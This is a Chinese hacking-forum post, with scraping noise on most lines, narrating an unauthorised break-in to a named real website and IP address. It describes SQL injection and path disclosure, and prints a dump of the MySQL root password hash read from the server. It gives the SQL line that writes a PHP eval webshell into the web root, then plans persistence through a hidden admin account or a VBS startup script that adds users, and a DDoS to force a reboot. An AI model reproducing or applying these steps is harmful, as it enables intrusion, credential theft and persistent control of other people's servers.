第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏2 Z C4 [- i) x: b0 D
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!1 k) q) V. g. J5 P1 r
$ R4 J& u. Z/ Z G
4 Q" } d0 Z0 b h( w
4 B" G! D6 P8 P7 V6 M
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 4 m! S, t! q& s* L9 p
/ \( j2 T6 k1 A1 \
那么想可以直接写入shell ,getshell有几个条件:( \; a0 c* q$ k5 E, i! A
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF * o* q1 G6 u1 D2 \ n' g) l a
6 f; i; H" S2 A6 M5 o/ T
试着爆绝对路径:
* B1 O6 @7 ^; C1./phpMyAdmin/index.php?lang[]=1 5 e8 J: S3 ^5 ?/ X+ f
2./phpMyAdmin/phpinfo.php
3 p# N) `6 |+ L3./load_file() $ F# L2 ?+ D7 F( j+ y# H
4./phpmyadmin/themes/darkblue_orange/layout.inc.php , i9 E+ t( ]; \2 M6 k
5./phpmyadmin/libraries/select_lang.lib.php H2 s# s6 S9 Q3 i! g- B E
6./phpmyadmin/libraries/lect_lang.lib.php
+ V1 F/ p" v) q8 `- X, Y# H7./phpmyadmin/libraries/mcrypt.lib.php 7 u$ a- W7 n' N4 W3 U
8./phpmyadmin/libraries/export/xls.php
' @" Q: N6 `# B3 {# ]" D, T
2 T- g% w* W: r. {, o+ b \均不行...........................
: b [7 `+ s3 b5 |. H' f# m; ]4 p* d0 u) }* Q; `% F$ I
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php H0 z- |3 _! {; h
5 }& Y" T/ K3 F, \
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 0 n% q" i/ k$ Y) d I! P" A
, b4 V6 |7 J) Q3 L+ B; i
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
3 N2 @! {5 L+ k5 J( u) Y' p6 F
% L5 ^5 ?# S Z" T! x3 r敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
- ~. T7 ]4 F" d' o. G: b0 B$ B8 N5 B2 S6 J5 O/ }
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell " f; S1 x+ K6 k( E, }) E8 J
9 w/ L+ u" M* m% D
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini $ O6 }5 H9 Z" N# @: z3 y& v2 i/ S
9 R( s: k7 Q: v k0 k4 V# n/ Y" t自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
! h% l) y0 O) m- [' K0 I8 u' g) ^% P: M& Y+ A
成功读到root密码: " k {( L2 L/ ]& R( b s. i! ~! X
) L7 C( J+ E* H8 N& \4 S
17---- r(0072) ; p, t# K2 v( h6 q/ [
18---- o(006f) % {2 o% o/ X) R0 o
19---- o(006f) m2 x4 V$ ]0 }8 [, r) P
20---- t(0074)
2 a7 C# X4 M, E& x21---- *(002a)
4 q/ v- H: k* m, D# u1 R22---- 8(0038) 0 ^ L3 o' `8 C# H. E
23---- 2(0032) 1 w( R: ^( f% @# D6 e
24---- E(0045)
+ i: M/ Q* F" j7 {$ j& I) Y25---- 1(0031) : X- o. Z1 W% E
26---- C(0043) * S* a$ g& J6 B& I
27---- 5(0035)
% U$ }4 g7 G8 s, g3 L* _* R28---- 8(0038) ( H$ ]- o, @: k' s; J) a* X' `
29---- 2(0032)
( Z! t* |+ L. [/ h; y. Q" q, e30---- 8(0038) $ y: _5 A5 V- k3 e9 {( J
31---- A(0041)
# \% Z6 m7 n8 _! ]7 h2 G! b32---- 9(0039) $ ^9 l7 `' i: s; G& \9 Q; A
33---- B(0042)
7 h. g; {, _' W7 @+ U34---- 5(0035)
5 ~8 _; e, x' f! a$ A35---- 4(0034) , l- x& g3 k F9 V7 M- D7 d
36---- 8(0038) ; Z: W0 q0 u: W4 ~- r g7 a" D
37---- 6(0036)
5 Q3 C2 P& i1 R, r38---- 4(0034)
" X- H3 n$ G1 g/ x$ Y8 N- b3 V39---- 9(0039)
; f6 ?1 @! l# k* M1 b* G40---- 1(0031)
# J, Z) Q5 j/ I1 F" A& `41---- 1(0031)
7 W, d4 i) w5 o$ J9 S42---- 5(0035)
0 Z! X3 y T- B( I8 U$ c7 ~43---- 3(0033) 1 _( d2 e$ b# I* a ^5 t* Y, ^
44---- 5(0035)
! Q( [, y6 q7 P& [; G45---- 9(0039) p" \! s: S4 D# H- r0 u
46---- 8(0038) 7 F0 R1 i, N: T4 |, J* @
47---- F(0046)
3 u: ` ]; F& A+ K0 G48---- F(0046)
* F1 Q! }" f! ?+ c6 R49---- 4(0034)
& T( E9 J; B5 ~" |; `" C0 K50---- F(0046)
n# ]) _! F- Q51---- 0(0030) 9 K/ Z/ R3 a. {, N( V! a2 ^
52---- 3(0033) 8 m6 a6 Z k% }* ^9 z
53---- 2(0032)
6 v) n: O9 W+ H; n: R2 w0 l' u2 j54---- A(0041) 8 ]* ^- n! E0 M0 Q" `( I# d
55---- 4(0034)
9 H0 ^& O4 a/ k# z3 l9 v% `7 |56---- A(0041) 0 o. D1 s% n {' O
57---- B(0042) : g d2 }; k6 p' `8 y
58---- *(0044) 5 X7 ], i% R: u, r |, Q3 I3 @
59---- *(0035)
9 y& H4 \4 @: Z X; q1 g* j60---- *(0041) - z) f# l) L X5 w: _4 j2 V
61---- *0032)
$ ^- T. L; }3 B: P0 b _# D( G. U$ c/ i4 w. {
解密后成功登陆phpmyamin
2 N8 x, S( N) Q0 R 9 z g! r' k8 b9 w% V4 b. P
# Y) U" C" O4 ]6 w$ t& M4 G
8 ?' L: ]& R# p/ D
5 d6 Z x2 ?9 f" ?
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' # b, s, G% h3 j/ ~4 W
6 X" X3 s4 u \1 }$ g
成功执行,拿下shell,菜刀连接:
% k! Z2 X0 K4 s/ f, L
9 E5 {8 [( J+ M' q服务器不支持asp,aspx,php提权无果...................
. h' ^& D6 n) ?+ f+ A: _6 F, \( O3 }/ }- ]1 E
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
7 L4 a# O, D) }# S" A& @服务器上已经有个隐藏帐号了 2 j& s. C2 t/ W( R; {
别名 administrators7 l, X+ o D. P9 H! g9 g( B/ v0 y
注释 管理员对计算机/域有不受限制的完全访问权
9 X: V& Z; C$ {% L. g4 |! _. Q成员 ; s. @" ^+ ]+ L7 U+ M6 t+ f5 _
-------------------------------------------------------------------------------
$ E+ F* c# Y: y# ] F9 U6 }admin
3 f9 k6 g3 f. D% yAdministrator) v* A' [2 U8 k6 R# R4 u
slipper$
$ [6 X( v5 X. T% X6 `: ?" Jsqluser
) L/ ]$ d. k+ [6 P命令成功完成。
; c* S. D# n2 D% G1 j; P3 u; G
" k- a" O6 B' H* x0 s7 P服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。$ z9 c& n& B/ q) C
% P; n, a0 z/ t3 h7 h, s
ddos服务器重启,不然就只能坐等服务器重启了...............................7 }5 Y& i- C/ g
% q4 C, |: c3 S# M3 p$ [
0 f, S* b4 v7 x) M9 W% A. @8 P+ B | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
